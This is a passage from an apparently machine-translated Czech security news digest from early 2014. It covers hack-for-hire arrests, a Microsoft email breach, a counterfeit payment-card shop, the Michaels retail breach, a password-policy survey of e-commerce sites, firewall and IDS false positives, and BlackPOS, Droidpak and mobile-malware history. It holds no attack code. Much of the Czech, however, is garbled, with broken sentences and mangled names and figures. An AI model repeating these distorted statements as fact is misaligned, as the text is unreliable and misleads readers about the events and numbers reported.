Arthur Drake, 55, z Bronxu, v New Yorku, který zaplatil přibližně 1,011 dolarů, aby se e-mailového účtu hesla.

Tyto poplatky jsou produktem mezinárodní vyšetřování koordinované Federálního úřadu pro vyšetřování s ředitelstvím pro odhalování organizovaného zločinu a terorismu (DIIOCT) a ředitelství pro boj s organizovaným zločinem (DCCO) Rumunska, Ústřední úřad pro vyšetřování (CBI) ze dne Indická republika a ministerstvo veřejné bezpečnosti (MPS) v Čínské lidové republice. V Rumunsku, DCCO, pod vedením DIICOT, provedl vyhledávání tří rezidencí spojených s jednotlivcům, kteří působí na webové stránky zhackgroup.com , spyhackgroup. com , rajahackers.com , clickhack.com , ghostgroup.org a e-hackers.com . Čtyři jednotlivci byli obviněni a zadržen v souvislosti s provozem těchto webových stránek. Přibližně 1600 e-mailových účtů byly ovlivněny plánu provozovaného subjekty v Rumunsku v období mezi únorem 2011 a října 2012. Centrální úřad pro vyšetřování v Indii zatčeni Amit Tiwari pro provoz webové stránky www.hirehacker.net a www.anonymiti.com a provedli prohlídky sídel Tiwari a jeho spolupracovníků. Provozovatelé těchto dvou webových stránek je zodpovědná za získání neoprávněného přístupu k asi 935 e-mailových účtů (z toho 171 patřilo k obětem v Indii), v období od února 2011 do února 2013. MPS v Číně zatčen Ying Liu, také známý jako "Brent Liu," pro provoz webových stránek hiretohack.net . Liu je zodpovědný za získání neoprávněného přístupu k asi 300 e-mailových účtů v období mezi lednem 2012 a března 2013.


Microsoft odhaluje donucovacích dokumenty byly v poslední hack ukradený
3.2.2014 Incident
S krátkou blogu, Microsoft v pátek oznámila, že neznámé hackeři mohli přistupovat a exfiltrated informace o donucovacích žádostí o informace z mnoha napadených e-mailových účtů zaměstnanců.

Společnost má v poslední době terčem pro-Assad syrské elektronické armády (SEA), které podařilo napadnout počtu úředních blogy Microsoft, Twitter účtů a e-mailových účtů. "Pokud zjistíme, že došlo k narušení zákaznické informace vztahující se k těmto žádostem budeme přijímat vhodná opatření Z ohledem na soukromí našich zaměstnanců a zákazníků -. stejně jako citlivost dotazů činných v trestním řízení - nebudeme komentovat platnosti jakýchkoli ukradených e-mailů nebo dokumentů, " napsal Adrienne Hall, generální ředitel na důvěryhodný Computing Group společnosti Microsoft. Zatímco ona neřekla, kdo byl za všemi těmito útoky, když se vyjádřil , že všechny tyto phishingové útoky se zdají být spojené. Do té doby, SEA zřejmě potvrdily , že jsou za útokem, a řekl, že bude se zveřejněním ukradené právní dokumenty na mediální místě, aby dokázal, že to není jen činný v trestním řízení, který žádá o uživatelských dat od společnosti Microsoft. Hall bagatelizoval útok, říká, že "mnoho společností zápasí s pokusy o phishing od zločinci." Poznamenala také, že bude i nadále vzdělávat zaměstnance a provést změny, jak probíhají jejich sociální vlastnosti média, poté, co interní vyšetřování ukazuje, kde jsou slabá místa jsou.


Federálové převzít on-line padělaných karet e-shopu, zatčení jeho provozovatelů
3.2.2014 Incident
Tři muži, kteří údajně provozoval one-stop on-line obchod prodává padělané platební karty a holografické překryvy, které mají být použity zločinci, aby falešné identifikace, čelí federální obvinění v probíhajícím šetření, které již vedlo v 11 dalších zatýkání, včetně zákazníků čelí federální obvinění . Sean Roberson, 39, Palm Bay na Floridě, který údajně provozoval stránky, je obviněn ze spiknutí s cílem spáchat podvodu drátu, spiknutí pro provoz s padělaným zbožím nebo službami, a spiknutí za účelem spáchání podvodu a související činnosti v souvislosti s funkcí ověřování . nahraditelnou obvinění se vrátil dnes v západní obvod Severní Karolíny poplatků Roberson je dva spiklenci, Vinício Gonzalez, 30, v Melbourne na Floridě, a Hugo Rebaza, 31, Palm Bay, Florida spiknutí k provozu s padělaným zbožím a spiknutí ke spáchání pošty podvodu, podvodu drátu a bankovní podvod. nahrazovala Obžaloba také účtuje zákazníkovi na internetových stránkách, Nashancy Johnny Colbert, 27, Charlotte, NC, s jedním počtu spiknutí s cílem spáchat poštovní podvod, podvodu drátu a bankovní podvod. FBI a USPIS byly vyšetřuje on-line prodejna, fakeplastic.net , od ledna 2013. Roberson začal prodávat padělané karty a související položky, jako již v dubnu 2011 a zahájila fakeplastic webové stránky v červnu 2012. Roberson vlastnil a provozoval web s pomocí Gonzalez a Rebaza. Od dubna 2011 Roberson a jeho spiklenci splněny objednávky na zhruba 69.000 padělaných kreditních karet - jak reliéfní a neprolisované - více než 35000 holografické nálepky používané k výrobě padělané karty se objeví více legitimní a více než 30.000 identifikačních karet stav holografické překryvy. Objednávky - více než 3600 pozemky - byly přepravovány přes americkou poštu. Gonzalez byl primárně zodpovědný za výrobu padělků platebních karet, obalů na kontraband pro zasílání a uvádění US Express Mail obálky v e-mailu dodání do fakeplastic zákazníky. Spiklenci použít paměťové zařízení na Floridě ukládat zásoby a vyrábět padělky platebních karet a Gonzalez často navštívil paměťové jednotky k vytvoření vlastní-embosovaných karet a připravit poštovní balíky. Vymáhání práva zatčen Gonzalez 4. prosince 2013, zatímco on byl v úložného prostoru - zabavení počítačů, tiskáren, padělané karty, je razicí a další kontraband. Rebaza byl "běžec" pro trestné činnosti, který je zodpovědný za vyzvednutí balíčků, které obsahují výnosů z trestné činnosti a dodávky z mailu "drop" pro fakeplastic webových stránkách. Colbert byl pouze pro členy zákazník na webových stránkách, který umístil a dostal rozkaz padělaných platebních karet dodávaných k němu prostřednictvím pošty. Činných v trestním řízení provedeny domovní prohlídce na 3 leden 2014, na Colbert v Charlotte bydliště zadření, mimo jiné, 41 padělaných platebních karet, s vyraženým Colbert jména nebo jména jiných osob. Činných v trestním řízení také obnovit odhozenou US Express Mail obálka odeslaná z fakeplastic webových stránek. Použití konzervativní odhad ztráty 500 dolarů spojené s každé padělané platební karty (odvozené od federální trestní sazbou odhad ztráty spojené s informacemi ukradené platební karty), vymáhání práva odhaduje, že ztráty spojené jen s padělky platebních karet obchodovaných podle Roberson a jeho spiklenci na více než 34.500.000 dolar. Roberson osobně dělal více než 1,7 milionů dolarů z programu. fakeplastic web byl používán různými skupinami pachatelů trestné činnosti v celé zemi často odkazoval se na jako "mykání" nebo "hotovost" posádky. Tyto posádky koupit ukradené čísla platebních karet a související informace - odkazoval se na jako "datová stopa" nebo "skládek" - což se obvykle objevují na magnetickém proužku na zadní straně oprávněných platebních karet. Nelegální prodejci této informace se obvykle dostat přes hackování nebo skimming operace zahrnující instalaci speciálního zařízení na místech, ATM nebo point-of-prodejní terminály. Ukradl data jsou nakonec dát na prázdnou kartu a používá k výrobě neoprávněné transakce. Sofistikovanější hotovost mimo provoz pomocí custom-made padělané platební karty embosované se stejnými čísly účtů, které byly uloženy na zadní straně karty, a často získávají falešný identifikační karty, aby se snížila pravděpodobnost detekce z činných v trestním řízení. trestní podzemí se vyvinula ze zlomených, regionálních operací na trhu založeného na internetu, kde kupující a prodávající po celém světě můžete inzerovat, nákupu a přenosu ukradených dat skladby. Fakeplastic website přinesl fyzické nástrojů potřebných pro výběr hotovosti z operací ve světě e-commerce, neboť eliminuje potřebu pro posádky k nákupu drahého hardwaru. prosinci 2013 místo má více než 400 členů. Členové mají přístup k fakeplastic webové stránky a hledají na nákup padělaných platebních karet, by mohly procházet dostupné šablony padělky karet na internetových stránkách je. Členové pak mohou vybrat, zda na vstupu konkrétních informací, které mají být vyraženým na kartách, a zda chtějí další funkce ověřování -. Jako jsou holografické nálepky Najednou stránkách přijato Liberty Reserve on-line měny, ale krátce poté, co federální obvinění proti Liberty Reserve byly zveřejněny v jižní obvod New Yorku 05. 2013, fakeplastic web přestala přijímat tuto měnu a začal přijímat Bitcoin, je kryptografický založené na digitální měně. Jak je uvedeno v sekci stránek "novinky", Bitcoin byl viděn jako "bezpečné" a "anonymní" způsob platby za kontraband. FBI a US Postal Inspection Service (USPIS) převzal kontrolu nad stránek, fakeplastic.net , na 05.12.2013, a dělal více než 30 kontrolovaných dodávek objednaných materiálů - nedovolit tyto materiály k opuštění řízení v oblasti vymáhání práva. Stížnost podala proti Roberson si můžete prohlédnout zde , ale Brian Krebs má dobrou (a kratší) write-up o tom, jak orgány, podařilo se ho vázána na internetových stránkách.


Americké mega-prodejce Michaels byl pravděpodobně také byla porušena
3.2.2014 Kriminalita
Texasu usazený specialitou retailer Michaels Stores je poslední společností, která oficiálně oznámit, že to bylo cílené počítačoví podvodníci, aby šli po data z platebních karet svých zákazníků.

Žádné podrobnosti o pravděpodobném porušení dosud nebyla potvrzena, ale společnost je "úzce spolupracuje s federální vymáhání práva a vede vyšetřování s pomocí odborníků v oblasti bezpečnosti dat třetích stran, na zjištění skutečností." "I když šetření probíhá, na základě informací, které společnost získala, a ve světle široce hlášených trestných úsilí proniknout do datové systémy amerických maloobchodníků, Michaels se domnívá, že je vhodné, aby svým zákazníkům vědět, potenciální problém mohlo dojít, "uvedli v tisku zpráva zveřejněna v sobotu. "Jsme znepokojeni tím, že může být zabezpečení dat útok na Michaelse, které mohou ovlivnit informace o platebních karet našich zákazníků a jsme s agresivní opatření k určení povahy a rozsahu problému," řekl Chuck Rubin, CEO. "I když jsme to potvrdili kompromis na našich systémů, věříme, že je v nejlepším zájmu našich zákazníků, upozornit na toto potenciální problematice, aby mohli podniknout kroky, aby se ochránili, například tím, že přezkoumává své výpisy z účtu platební karty na neoprávněné náklady. " "Pokud si myslíte, že vaše platební karta může být ovlivněna měli byste ihned kontaktovat svého banku nebo vydavatele karty," uvedl Rubin v otevřeném dopise zveřejněném na stejný den. "Pokud najdeme jako součást našeho šetření, že některý z našich zákazníků byli postiženi, nabízíme ochranu identity a dohledu nad úvěrovými služby pro ně bez nákladů." Se všemi nejnovějšími odhalení o data porušení zaměřených na velké americké Maloobchodníci ( Target a Neiman Marcus ) a spekulace ten druhý jsou ovlivněny uživatelé platebních karet ve Spojených státech by měl dělat dobře, aby se vždy dávat pozor na výpisech z účtu platební karty. Bohužel, s tím, jak se věci vyvíjejí, že je to dobrý kus poradenství pro každého, kdo používá payment karty, bez ohledu na to, kde žijí.


Který e-commerce weby dělat více pro ochranu své heslo?
3.2.2014 Bezpečnost
Spotřebitelé stále více sdílejí své osobní údaje, včetně informace o platbě, s rostoucím počtem elektronických obchodů. Klíče, které chrání jejich osobní údaje jsou hesla, které používají pro tyto stránky a slabá hesla by mohly být katastrofální pro zabezpečení osobních údajů.

Dashlane Roundup hodnotí hesel z top 100 e-commerce weby v USA tím, že zkoumá 24 různých kritérií hesla, že Dashlane označila za důležité, aby on-line bezpečnosti, a udělovat nebo dokovací bodů v závislosti na tom, zda stránky splňují kritérium, nebo ne. Každé kritérium je dáno + / a - ​​bodovou hodnotu, což vede k možnému celkové skóre mezi -100 a 100 pro každou lokalitu. Klíčová zjištění:

55% stále přijímat notoricky slabá hesla jako "123456" nebo "heslo"
51%, aby žádný pokus blokovat vstup po 10 neúspěšných pokusech o zadání (včetně Amazon, Dell, Best heslo
Koupím, Macy a Williams-Sonoma)
64% má velmi pochybné hesla postupy (příjem negativní celkové skóre ve Roundup)
61% neposkytují žádné rady o tom, jak vytvořit silné heslo při registraci a 93% neposkytují posouzení na obrazovce pevnost heslo
Pouze 10% zaznamenal nad hranicí pro dobrou politiku hesel (tj. 45 bodů nebo více v Roundup)
8 míst, včetně Toys "R" Us, J.Crew a 1-800-Flowers.com, posílat hesla ve formátu prostého textu prostřednictvím e-mailu.
Apple získal nejvyšší hodnocení a byl jediný prodejce získat perfektní skóre, zatímco Newegg, Microsoft, Chegg (svázaný pro druhé), a Target zaokrouhlí se na top 3. MLB.com, Karmaloop a Dickovi Sportovní zboží obdržel tři nejnižší skóre . Amazon, Walmart, Victoria Secret a Toys "R" Us byly také jedny z nejnižších zařadil stránkách, protože všichni pacienti dostávali skóre -35 a pod.

Tyto nálezy jsou znepokojující, zvláště když zkoumal v souvislosti s mnoha nedávných on-line bezpečnostních otázkách v hlavních maloobchodníků, jako je Starbucks. Ty naznačují, že některé z nejlepších e-commerce weby v USA neprovedou základní zásady hesel, které by mohly adekvátně chránit své osobní údaje uživatelů. Uživatelé s rizikem nebezpečí se slabou politiku hesel je, že opustí osobní údaje uživatelů zranitelný. Slabší heslo, tím snazší je pro hackery proniknout do účtu. Proto, stránky s mírnější politiky hesel opouští své uživatele vystaveni většímu riziku. Většina lokalit přijímat deset nejčastěji používaných hesel jako "123456", "111111", a dokonce i slovo "password". Dashlane také zjistil, že 62% nevyžadují kombinaci písmen a čísel, a 73% přijímám hesla s 6 znaků nebo méně. MLB dokonce umožňuje uživatelům používat slovo "baseball", jak své heslo. Kromě povolení slabá hesla, počet e-commerce weby nemají účty uživatelů po opakovaných neúspěšných pokusech o přístup k uzamčení. Četná místa, včetně Amazon a Dell, umožňuje nepřetržitý normální login pokusí i po 10 neúspěšných pokusech o zadání hesla. Jedním z nejjednodušších způsobů hackeři používají proniknout na účet je automatizovaný vstup běžně používaných hesel. Omezení přístupu k účtu po několika neúspěšných pokusech o zadání je jednoduchý způsob, jak omezit tuto taktiku. Když nad dva problémy jsou spojeny, se stává snadné pro hackery, aby přístup k mnoha účtů, protože se může opakovaně pokusit nejčastěji používaných hesel, aniž by byla blokována. Také mezi více nebezpečné praktiky je zasílání hesel ve formátu prostého textu prostřednictvím e-mailu. Naštěstí tato praxe nebyla převládající, ale studie zjistila, že několik míst, včetně Toys "R" Us, J.Crew a 1-800 -. Flowers.com, statických hesel uživatelů e-mailu "ve formátu prostého textu řešení je jednoduché , aby se jejich Politiky hesel bezpečnější, Dashlane doporučuje, aby e-commerce weby přijmout několik jednoduchých zásad:

Požadovat, aby hesla obsahovat alespoň 8 znaků a kombinace horní / malých písmen, čísel a symbolů
Blokovat přístup k účtu po 4 nezdařilo přihlášení
Poskytnout uživatelům poradenství na obrazovce o tom, jak si vybrat silné heslo při registraci
Poskytnout uživatelům s hodnocením na obrazovce síly hesla, zatímco oni se rozhodli heslo.
Všechny tyto postupy mohou být prováděny rychle a levně snadno dostupných open-source technologií. Počet míst v top 100, jako je Williams-Sonoma, Chegg a CDW, které již byly provedeny mnohé z těchto postupů. Někteří maloobchodníci mohou argumentovat, že tyto požadavky bránit uživatelský komfort, ale společnosti, jako je Apple, pravděpodobně nejznámější značky na seznamu, ukázaly, že je možné, aby se tak bezpečný a úspěšný. V každé kategorii jsme testovali, Apple implementoval 4 jednoduché zásady a postupy, doporučujeme výše. Tyto politiky za následek společnost je udělena pouze perfektní skóre v této studie. Target, Nike a Microsoft také obdržel vysoké hodnocení, protože všechny vyžadují, aby uživatelé měli bezpečná hesla, která obsahují písmena, číslice a horní kombinace / velká písmena.


Při útoku není útok
3.2.2014 Počítačový útok

Myslím, že jsem viděl, že odkazoval se na jako "X-Files Effect". Právě jste nainstalovali nový firewall nebo IDS, je to stále všechno nové a lesklé a protokoly jsou stále svěží a zajímavý. Při pohledu na protokolech, začne svítat na vás: "Jsou tam dostat mě!". Zatímco mnoho z těchto útoků jsou útoky, tam jsou také docela málo falešně pozitivních, které se obvykle zobrazují v protokolech. V tomto bodě, umožňuje rychle definovat falešné poplachy: Jedná se o benigní provoz, který je mylně považován za útok, nebo útok, který prostě nemá vliv na vás (Famous SQL Slammer útok proti hostiteli Linux).

Podívejme se na několik příkladů jsme narazili v poslední době:

abcd je neustále posílá DoS ACK odpovědi na mé síti, chtěl bych nahlásit tomuto zneužívání a naučit se, jak nahlásit zneužití v budoucnu snadněji v budoucnu, protože tento druh věcí se děje po celou dobu.

Děkujeme, že jste si udělali čas na čtení to. Níže je log za incident.

[DoS útok: ACK Scan] od zdroje: abcd, port 80, čtvrtek ledna 30,2014 14:10:02

To je e-mail jsme obdrželi přibližně jednou za měsíc. Ve většině případů je zdroj zaneprázdněn webový server, někdy CDN (Content Delivery Network) jako Akamai. Důvodem těchto záznamů je, že většina firewallů zváží připojení uzavřen, pokud není aktivita byla vidět na chvíli. Nicméně, v tomto případě, spojení je stále otevřený a webový server bude nakonec poslat další datový paket, který je následně odmítnut. To není výsledkem SYN flood útok (více o tom později) a nejsem si jistý, proč to útok DoS tento konkrétní přístroj popisky.

Pokud někdo oklamat vaši IP adresu, a používat to, aby zahájily útok DoS, pak byste měli vidět SYN ACK pakety, ne ACK pakety. Například mírně zkrácené iptables přihlášení:

SRC = abcd DST = vxyz LEN = 60 TOS = 0x00 PREC = 0x20 TTL = 49 ID = 0 DF PROTO = TCP SPT = 80 DPT = 62547 WINDOW = 2896 RES = 0x00 ACK SYN URGP = 0

Typické pro tyto protokoly: zdroj je dobře známý port serveru (80). Mohl by také být 443, 6667 či jiné porty. Cílový port je "náhodný" dočasných portů.

Ale není to jen firewally. IDS samozřejmě rádi na nás obtěžují falešných poplachů, aby nás prosit, aby správně nakonfigurovat. Ale my ne, protože IDS se všemi pravidly je možná nabídek povolených je tak mnohem bezpečnější! (Sarkasmus, pokud jste si všimnout toho ...)

Snort například má velmi elegantní funkci, plugin "citlivé údaje". To může odhalit citlivé údaje, jako jsou e-mailové adresy nebo čísla sociálního zabezpečení jsou zaslaných jasné. Zde je příklad upozornění:

[138:5:1] SENSITIVE-DATA e-mailové adresy [Klasifikace: Citlivá data] [Priorita: 2] {TCP} abcd: 80 -> vxyz: 63715

E-mailová adresa byla přijata z portu 80. Takže jinými slovy: máte přístup na webovou stránku, která obsahovala e-mailovou adresu. Asi ne, co bych uvažovat o "leak", a to zejména v případě, že webový server byl umístěn mimo mou kontrolu. Viděl jsem tento podpis vyvolat hodně na FTP a samozřejmě SMTP komunikace. Pravděpodobně stále dobrá připomínka není jistý starší protokol jako přehledným textovým ftp.

Ale podívejme se na složitější jeden:

Obnovit mimo okno [Klasifikace: Potenciálně Bad Dopravní] [Priorita: 2] {TCP} 23.202.88.93:80 -> 70.91.145.11:59867

Provoz, který vyvolal toto upozornění:

a.80> b59782: Vlajky [P.], seq 1886684918:1886685156, ack 659663868, vyhrát 7240, volby [nop, nop, TS val 1132895224, s. 605850989], délka 238
a.80> b.59782: Vlajky [F.], seq 1886685156, ack 659663869, vyhrát 7240, volby [nop, nop, TS val 1132895245, s. 605851009], délka 0
a.80> b.59782: Vlajky [R], seq 1886685157, vyhrát 0, délka 0

Jak můžete říct, pořadové číslo pro paket resetu je ve skutečnosti přímo na. To bylo opět spíše vypršelo spojení. V tomto případě, webový server byl Akamai a zdá se, že chtěli poslat další restart, pravděpodobně se ujistit, že spojení je dole a ušetřete jim některé zdroje. Připojení sama byla spuštěna "kontrola aktualizací" AV nástroje.

Což mě dostává k další oblíbené firewall falešně pozitivní:

SRC = vxyz DST = abcd LEN = 40 TOS = 0x00 PREC = 0x00 TTL = 63 ID = 49424 DF PROTO = TCP SPT = 80 DPT = 52968 WINDOW = 14600 RES = 0x00 ACK FIN URGP = 0

"FIN-ACK" je blokován přichází v tomto případě z mého webového serveru na (platnou) klienta. iptables miluje blokovat konečné FIN-ack, jak to považuje za připojení již uzavřena.

Každý dobrý falešně pozitivních pořád běží do?


Android: Připraven nástroj pro odhalení špehovacích aplikací

3.2.2014 Mobil
Nová bezpečnostní aplikace pro systém Android uživatelům ukáže, které aplikace pracují s informacemi o jejich poloze.

Za nástrojem stojí skupina výzkumníků, která chce uživatelům Androidu umožnit lépe kontrolovat vlastní data. „Všechny aplikace sice potřebují k používání geolokačních údajů povolení od Androidu. Problém je v tom, že lidé tomuto výchozímu zpřístupnění nevěnují příliš pozornosti,“ popsal současnou situaci šéf projektu Janne Lindqvist.

Stejně jako v systému iOS, i uživatelům mobilního operačního systému Android se v případě, že se některá aplikace pokusí o přístup k informacím o jejich poloze, zobrazí na displeji blikající ikona GPS. Málokdo si jí však všimne. V horším případě pak lidé vůbec nevědí, co se jim blikající ikona vlastně snaží naznačit.

Výzkumníci se proto snaží přijít s vlastním řešením, které by uživatelům dalo jasně najevo, že je jejich poloha využívána nějakou třetí stranou. Vyzkoušeli přitom několik metod včetně informování uživatele pomocí zobrazení zprávy „Aplikace xy používá vaši polohu“ na displeji chytrého zařízení.

V Androidu sice neexistuje žádný „oficiální“ způsob, jak by jedna aplikace mohla sledovat používání informací o poloze jinými aplikacemi. Vědci však objevili možnost, jak pro tento účel využít rozhraní API Android Location.

V současné chvíli výzkumníci připravují aplikaci na umístění do obchodu Google Play. Pracovně ji nazvali RutgersPrivacyApp. Oficiální název zatím nemá. Sami vývojáři prý budou rádi za každý nápad.

Aplikace zatím byla testována malou skupinou na Rutgersově univerzitě v New Jersey. Zabývají se především tím, jak lidé reagují na informaci o tom, že nějaká aplikace používá jejich polohu. Zatím se ukázalo, že uživatelé byli velmi zaskočeni tím, jaké aplikace mají zájem o polohu jejich zařízení či jak často tuto informaci zjišťují.

Je pravděpodobné, že o aplikaci bude mezi uživateli Androidu zájem. Zejména skandál kolem špehovacích aktivit americké Národní bezpečnostní agentury totiž způsobil, že se lidé více zajímají o své soukromí. Nedávno se například ukázalo, že tajné služby mají zájem o mobilní verze Facebooku, Twitteru nebo LinkedIn. Vědci z Carnegie Mellon University v Pensylvánii zase zjistili, že zdánlivě bezpečné aplikace typu Angry Birds a Dictionary.com rovněž shromažďovaly zajímavá data o svých uživatelích.


Cílová POS autor malware odhalí
2.2.2014 Viry
V neočekávaným vývojem událostí, podezřelý ruský autor BlackPOS (nebo Kaptoxa) potvrdil, že byl skutečně ten, kdo ji vytvořil. Jako připomínka: Výzkumníci z zpravodajského agregátoru InterCrawler Analyzovali měsíce příspěvků na fórech a podzemních byl si jistý, že malware byl vytvořen a uveden do prodeje někým, kdo daboval sám "ree4". Pomocí této informace jako výchozí bod, ale sledoval ho do profilu Vkontakte, který řekl, že jeho jméno bylo Rinat Shabaev, a zdálo se, že být 17-letý z Petrohradu. Jak se ukázalo, byly částečně pravdu - Rinat Shabaev dělal rozvíjet malware, ale není teenager, a on žije v Saratov, hlavního města stejnojmenné ruské regionu . 23-rok-starý Shabaev souhlasil s interview s LifeNews (via Google Translate), ve kterém vysvětlil, že on nepsal malware od nuly, ale pouze přidána funkce pro něj. Tvrdí, že malware nebyl navržen speciálně pro krádež dat, ale jako testovací nástroj pro kontrolu, zda je databáze, která data mají být zaslány, je zranitelný. Přesto připouští, že mohou být použity k trestné činnosti. On také říká, že upravený malware ve spolupráci s jiným hacker, ale říká, že neví, kdo to je, nebo kde bydlí - se s ním setkal na internetu. On nikdy neměla v úmyslu používat aplikaci sám, ale chtěl ji prodat ostatním, kteří by mohli. Na konci, říká, obrátil ji ke svému partnerovi. On je nyní hledají normální, stabilní zaměstnání, dodal.


Malware infikuje Android-běh zařízení přes PC
2.2.2014 Viry | Mobil
Vědci nedávno objevili PC trojského koně, jehož konečným cílem je ohrozit Android běžící smartphone u cíle nebo tablet s informačně-krást malware. malware v pochybnost byl nazván Droidpak. Výzkumníci společnosti Symantec se nepodařilo podělit, jak je dodán potenciálních obětí na prvním místě, ale oni vyšťoural, co to dělá. Za prvé, je to klesne škodlivý DLL a zaregistruje jako systémová služba. Pak se dotýká vzdálený server a stáhne konfigurační soubor z něj. Informace v něm obsažené umožňuje, aby v případě potřeby stáhnout škodlivý APK (Android balíčku aplikací) soubor, stejně jako i Android Debug Bridge nástroj. Ten umožňuje malware k instalaci škodlivého APK žádné přístroje založené Android obětí připojí k počítače. Po instalaci malware se snaží skrýt svou přítomnost tím, že předstírá jako "Google App Store" aplikace a na pozadí vyhledává on-line bankovní aplikace, které nainstaloval uživatel. Pokud ji najde, se snaží přesvědčit uživatele k odstranění je to tím, že falešnou záminku a snaží se je přimět ke stažení a instalaci škodlivého ekvivalent. . Netřeba dodávat, že posledně uvedené záznamy jakákoliv (bankovnictví) informace, které se vstoupil do nich Kromě toho, to může také zachytit a mazat SMS zprávy - zaslané bankou oběti jsou pravděpodobně mezi ty, které nejsou povoleny na pop-up. Tento malware kombo je v současné době zaměřuje korejské uživatele, ale to může být snadno upraven tak, aby obhlédli pro on-line bankovních aplikací bank po celém světě, jsem si představit. Dobrou zprávou je, že malware rozhodně potřebuje uživatel provést instalaci škodlivých aplikací , takže uživatelé, kteří jsou ve střehu a vědět, jak rozpoznat tento typ sociálního inženýrství nebudou se zmást to dělá. Další dobrá věc je, že vypnete ladění USB na vašem zařízení se systémem Android bude blokovat tuto infekci vektor ( přečtěte si více o tom, co režim to a proč byste měli držet zakázána, pokud nechcete používat). Konečně, s dobrou AV řešení, jak na vašem PC a váš mobilní přístroj je vždy dobrý nápad.


Při pohledu zpět na 10 let mobilního malwaru
2.2.2014 Mobil | Viry
Od Cabir na FakeDefend, poslední desetiletí vidělo číslo mobilního malwaru explodovat. V roce 2013, Fortinet FortiGuard Labs zaznamenala více než 1300 nových škodlivé aplikace denně a je v současné době sleduje více než 300 Android malware rodin a více než 400.000 škodlivé Android aplikací. Kromě naprosté nárůstem počtu, další důležitý trend si uvědomit, je, že mobilní malware následoval stejný vývoj jako PC malware, ale v mnohem rychlejším tempem. Rozšířené přijetí smartphony - a skutečnost, že mohou snadno získat přístup k platební systém (telefonní čísla se zvýšenou sazbou) - z nich dělá snadné cíle, které lze rychle generovat peníze jednou infikován. Navíc mají funkce, jako je geo-umístění, mikrofony , vestavěný GPS a kamery, které všechny umožňují mimořádně dotěrný úroveň špehování jejich vlastníků. Podobně jako počítače malware, mobilní malware rychle se vyvinul do efektivního a účinného způsobu generování hotovosti proud, a zároveň podporuje širokou škálu obchodních modelů. V následujícím chronologie, FortiGuard Labs se zaměřuje na nejvýznamnější mobilní malware v průběhu posledních 10 let, a vysvětluje, jejich role ve vývoji hrozeb. 2004: První pokus Cabir byl svět je první mobilní červ. Navrženy tak, aby infikovat Nokia Series 60, její útok ve slově "Caribe" se objeví na obrazovce infikovaných telefonů. Červ pak šíří se tím, že hledá další zařízení (telefony, tiskárny, herní konzole ...), v těsné blízkosti pomocí funkce Bluetooth telefonu. "Odborníci se domnívají, že červ byl vyvinut skupinou hackerů zvané 29A jako" proof of concept " vzhledem k jeho relativně neškodného charakteru, "řekl Axelle Apvrille, senior mobilní anti-virus výzkumník s Fortinet FortiGuard Labs. 2005: Přidání MMS do mixu CommWarrior, objevil v roce 2005, zvedl kde Cabir skončil tím, že přidá schopnost šířit se pomocí jak Bluetooth a MMS. Po instalaci na zařízení, CommWarrior by se přistupovat ke kontaktním soubor napadeného telefonu a poslat sama prostřednictvím služby MMS dopravce ke každému kontaktu. Použití MMS jako způsob propagace představil ekonomický aspekt, neboť každé zprávy MMS odeslané, majitelé telefonů by vynaložit poplatek z jejich nosiče. Ve skutečnosti, někteří operátoři si říkal, že až 3,5 procenta z jejich provozu byla zdrojů na CommWarrior, a nakonec souhlasila s proplacením oběti. virus, který také zaměřila na Symbian 60 platformu, byla hlášena ve více než 18 zemích po celé Evropě, Asie a Severní Amerika. Celkem mobilní červ infikovaných více než 115.000 mobilních zařízení a poslal více než 450.000 MMS zprávy bez vědomí obětí, osvětlení poprvé, že mobilní Červ může šířit tak rychle jako počítačový červ. "V té době, Symbian byl nejoblíbenější smartphone platformu s desítkami milionů uživatelů po celém světě, "pokračoval Apvrille. "Nicméně, cílem za CommWarrior bylo propagovat sám sebe v co největší míře a ne zisk z poplatků, které vznikly prostřednictvím zpráv MMS." 2006: Po peněz po prokázané úspěchy Cabir a CommWarrior, bezpečnostní komunita zjistil Trojan s názvem RedBrowser vychvalováním několik klíčových rozdílů z jeho předchůdců. První bylo to, že byl navržen tak, aby infikovat telefonu přes Java 2 Micro Edition (J2ME) platformy. Trojan by se prezentovat jako žádost, aby (WAP) stránky procházení Wireless Application Protocol jednodušší. Zaměřením se na všeobecně podporován Java platformu spíše než operační systém zařízení, vývojáři Trojan byli schopni zaměřit mnohem větší publikum, bez ohledu na výrobce telefonu nebo operační systém. Druhý a možná důležitější rozdíl je, že Trojan byl specificky navrženy tak, aby využít Premium Rate SMS služby. Majitel telefonu bude obvykle nebude účtován přibližně $ 5 za SMS -. Další krok směrem k využití mobilního malware jako prostředek generování hotovosti proud přidané Apvrille, "Až do vzniku RedBrowser, bezpečnostní komunita věřil, že to bylo nemožné, aby jeden kus malware mohl infikovat širokou škálu mobilních telefonů s různými operačními systémy. Využití J2ME jako útočný vektor byl důležitým mezníkem v tomto období, stejně jako používání SMS zpráv jako mechanismus penězotvorné ". 2007-2008: období přechodu přes stagnaci ve vývoji mobilních hrozeb v průběhu tohoto dvouletého období došlo k nárůstu počtu malware, který přístupné služby se zvýšenou sazbou bez vědomí majitele zařízení. 2009: Zavedení mobilní botnet na počátku roku 2009, Fortinet objevil Yxes (přesmyčka "Sexy"), kus malware za zdánlivě legitimní "Sexy View" aplikace. Yxes také měl vyznamenání za bytí certifikované aplikace Symbian, který využil vtípek v rámci Symbian ekosystému, který umožnil vývojářům "odhlásit" aplikace samotné. Jakmile infikován, mobilní telefon oběti dopředu svůj adresář do centrálního serveru. Server potom předá SMS, která obsahuje adresu URL pro každý z kontaktů. Oběti, kteří kliknou na odkaz na stažení zpráv a nainstalovat kopii malware, a proces se opakuje. šíření Yxes byla do značné míry omezena do Asie, kde je infikováno nejméně 100.000 zařízení v roce 2009. "Yxes byl další zlomový ve vývoji mobilního malwaru z několika důvodů, "řekl Apvrille. "Za prvé, je považován za první malware zaměřením na operační systém Symbian 9. Za druhé, to byl první malware poslat SMS a přístup na internet bez vědomí mobilního uživatele, vývoj považován za technologickou inovaci v malware. Konečně, a co je možná nejdůležitější, hybridní model, který je použit pro samostatně výdělečně propagovat a komunikovat se vzdáleným serverem, dal Antivirus analytici důvod se obávat, že to byl možná forewarning pro nový druh viru - botnety na mobilních telefonech. Budoucí události by později ověřit, že vnímání ". 2010: Průmyslová věk mobilní malware 2010 znamenal významný milník v historii mobilního malwaru: přechod z geograficky lokalizovaných jednotlivců nebo malých skupin, aby ve velkém měřítku, pořádané zločinci působí na celosvětovém základě . To je začátek "industrializace mobilní malware", v níž útočníci uvědomili, že mobilní malware může snadno přinést hodně peněz, což vyvolalo rozhodnutí využívat hrozby mnohem intenzivněji. Rok 2010 byl také zavedení první mobilní 